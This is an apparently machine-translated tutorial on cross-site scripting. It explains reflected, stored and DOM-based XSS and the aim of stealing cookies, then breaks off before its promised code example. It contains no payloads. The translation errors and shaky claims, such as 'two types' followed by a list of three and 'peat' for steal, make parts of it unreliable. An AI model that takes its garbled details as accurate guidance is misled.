XSS Cross-Site Scripting in Web Security

Source: Internet
Author: User

XSS Cross-Site Scripting in Web Security

In this article, XSS (Cross-Site Scripting), one of the common web attack methods, is used to explain the attack principles and propose corresponding solutions.

XSS

XSS attack, full name:"Cross-Site ScriptingCross Site Scripting (XSS) is used to distinguish it from Cascading Style Sheet (CSS) to avoid confusion.

XSS is a computer security vulnerability that often occurs in web applications. It allows malicious web users to implant code into pages provided to other users.XSS is an attack on customer privacy of Web sitesWhen the customer's detailed information is stolen or controlled, it may cause a thorough security threat. Most website attacks only involve two groups: hackers and websites, or hackers and client victims. Unlike those attacks, XSS attacks involve three groups at the same time: hackers, clients, and Web sites. XSSAttack objectiveIt is to steal client cookies, or any other sensitive information that can be used on the Web site to determine the customer's identity. With the mark of a valid user, hackers can continue to assume that the user interacts with the site, thus impersonating the user.

For example, XSS attacks can be used to peat users' credit card numbers and private information. Attackers can execute malicious JavaScript code on the victim (client) browser by using the access privileges of the Web site. These are very limited JavaScript privileges. Except for site-related information, scripts are generally not allowed to access any other content. It is important to note that, although there are security vulnerabilities on the Web site, the Web site has never been directly hurt. However, this is enough for scripts to collect cookies and send them to hackers.

There are two types of XSS attacks:

1.Reflected cross-site scripting attacks

Through social engineering, attackers can send a URL Connection to the user to open the page. When the user opens the page, the browser will execute malicious scripts embedded in the page.

2.Storage-type cross-site scripting attack

Attackers can use the data entry or modification function provided by web applications to store data to servers or user cookies. When other users browse the pages that display the data, the Browser executes malicious scripts embedded in the page. All viewers will be attacked.

3.DOM cross-site attack

Because a piece of JavaScript code is defined in the html page, an html code is displayed based on the user input. Attackers can insert a malicious script during the input and execute the malicious script during the display.

The difference between DOM cross-site attack and the above two cross-site attacks is that DOM cross-site is the output of pure page scripts. Only javascript can be used for defense.

Principle

 

I believe that you have understood the probability of XSS. The following is an example of the attack principle. If the following is a piece of PHP code for our website:

 

<Tr> <td>
  
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.